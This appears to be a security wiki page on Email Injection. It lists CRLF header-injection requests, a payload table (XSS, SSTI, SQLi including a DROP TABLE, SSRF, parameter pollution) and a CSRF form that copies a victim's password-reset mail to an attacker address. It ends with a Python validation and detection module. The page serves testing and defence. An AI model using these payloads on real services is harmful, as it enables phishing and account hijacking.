Email Injection is an attack in which user-supplied input that the application uses to compose or send an e-mail is not sufficiently validated, so an attacker can tamper with the mail's headers or contents through malicious parameters.

```json
{
  "email": "sender@domain.com%0ACc:attacker@domain.com"
}
```
If the attack is successful, it can be used for impersonating an official account or phishing, and depending on the system involved, it can be used for account hijacking.
Reference: Various exploiting techniques using E-mail format
🗡 Offensive techniques
Detect
All sections where e-mails are sent after a web request, such as invitations and notifications, can be affected by Email Injection.

```http
POST /invite HTTP/1.1

email=hahwul@gmail.com
```

When the value received through the email parameter is passed to a mail transmission system such as SMTP without validation, the sender, recipients and contents of the e-mail can be altered by inserting CRLF (carriage return / line feed) characters, because a line break ends the current header and starts a new one.

```http
POST /invite HTTP/1.1

email=hahwul@gmail.com%0ASubject:Fake%20Subject
```
Exploitation
Common Vuln
| Type | Payload |
|---|---|
| XSS | `test+(<script>alert(0)</script>)@example.com`, `test@example(<script>alert(0)</script>).com`, `"<script>alert(0)</script>"@example.com` |
| SSTI | `"<%= 7 * 7 %>"@example.com`, `test+(${{7*7}})@example.com` |
| SQLi | `"' OR 1=1 -- '"@example.com`, `"mail'); DROP TABLE users;--"@example.com` |
| SSRF | `john.doe@abc123.burpcollaborator.net`, `john.doe@[127.0.0.1]` |
| Parameter pollution | `victim&email=attacker@example.com` |
| Email header injection | `"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com` |
| Wildcard abuse | `%@example.com` |
Stealing sensitive information

When combined with a vulnerability such as CSRF, it is possible to steal sensitive information such as the e-mail generated when resetting a password or a 2FA verification code.

```http
POST /invite HTTP/1.1

email=victim@domain.com%0ACc:attacker@domain.com
```

If the CSRF payload is built so that the request which triggers the e-mail also carries an Email Injection adding the attacker's address as Cc, then when the victim opens the CSRF page the password reset link is delivered to the attacker's mailbox as well, which can lead to account hijacking.

```html
<form action="https://weakness-service/findPassword" method="post">
<input type="text" name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>
```
Header/Content Injection

If an e-mail that is open to Email Injection is sent from an official account such as noreply@blahblah, phishing mail can be constructed from that official account by inserting newline characters into the mail header and manipulating Subject, Body, etc.

```http
POST /notify HTTP/1.1

email=victim@domain.com%0ASubject:Important%20Security%20Alerts%0A%0AFake%20Message!
```

In addition, when user input values are inserted into the mail body, the service can be made to deliver mail with unintended content by injecting HTML tags and CSS.

```http
POST /notify HTTP/1.1

email=victim@domain.com&name=alice<br>Please%20Click%20Me<!--
```
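As an added example (not code from the original page), covering both the CRLF header injection described under Detect and the HTML body injection above: a small Python module that shows how naive header concatenation lets an injected Cc: through, and the validation, log-side detection and escaping a service should apply instead. The function names and the accepted address shape are my assumptions.

```python
import html
import re
from email.parser import HeaderParser
from urllib.parse import unquote

# Allowed address shape (assumption): one unquoted local part and one dotted
# domain. Quoted local parts, (comments), [IP literals], '%' wildcards and '&'
# are rejected even though RFC 5322 permits some of them; a mail layer that
# only ever sends to plain addresses never needs them.
ADDR_RE = re.compile(r"[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

class EmailInjectionError(ValueError):
    """Raised when a user-supplied value must not reach the mail layer."""

def validate_address(value: str) -> str:
    """Return `value` unchanged if it is a plain address, otherwise raise."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise EmailInjectionError("control character (CR/LF/NUL) in address")
    if not ADDR_RE.fullmatch(value):
        raise EmailInjectionError("address does not match the allowed shape")
    return value

def looks_injected(raw_param: str) -> bool:
    """Log/WAF check: URL-decode the raw parameter the way the server does
    and look for a line break followed by something shaped like a header."""
    decoded = unquote(raw_param)
    return re.search(r"[\r\n][ \t]*[A-Za-z-]+[ \t]*:", decoded) is not None

def build_headers_unsafe(to: str, subject: str) -> str:
    """Naive concatenation: a CR/LF inside `to` ends the To: line and starts
    a new header, which is exactly the Cc:/Subject: injection shown above."""
    return f"To: {to}\r\nSubject: {subject}\r\n\r\n"

def build_headers_safe(to: str, subject: str) -> str:
    """Same header block, but the address is validated and the subject is
    folded onto one line so neither value can start a new header."""
    to = validate_address(to)
    subject = re.sub(r"[\r\n]+", " ", subject)
    return f"To: {to}\r\nSubject: {subject}\r\n\r\n"

def header_names(raw_message: str) -> list:
    """Parse a raw header block as a mail agent would and list the header
    names it sees; an injected Cc: or Bcc: shows up in this list."""
    return list(HeaderParser().parsestr(raw_message).keys())

def render_name_safe(name: str) -> str:
    """HTML-escape a value before placing it in an HTML mail body, so <br>,
    <!-- or style attributes in the input cannot change the rendered mail."""
    return html.escape(name, quote=True)
```

`looks_injected` is meant for reviewing access logs or writing a WAF rule, not as the only defence; `validate_address` is what the sending code path should call.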
RCE

In some cases the application sends mail by invoking an external mail program from the command line; PHP's mail() function, which hands the message to a sendmail binary, is a typical example. Here, as with Command Injection, insufficient handling of special characters during that process may eventually lead to RCE.
Tricks

- Subject: <TITLE>: sets the mail title
- Cc: <attacker mail address>: the attacker receives a copy of the mail through the Cc setting
- Reply-To: <attacker mail address>: designates the reply destination, so replies to the mail are received at that address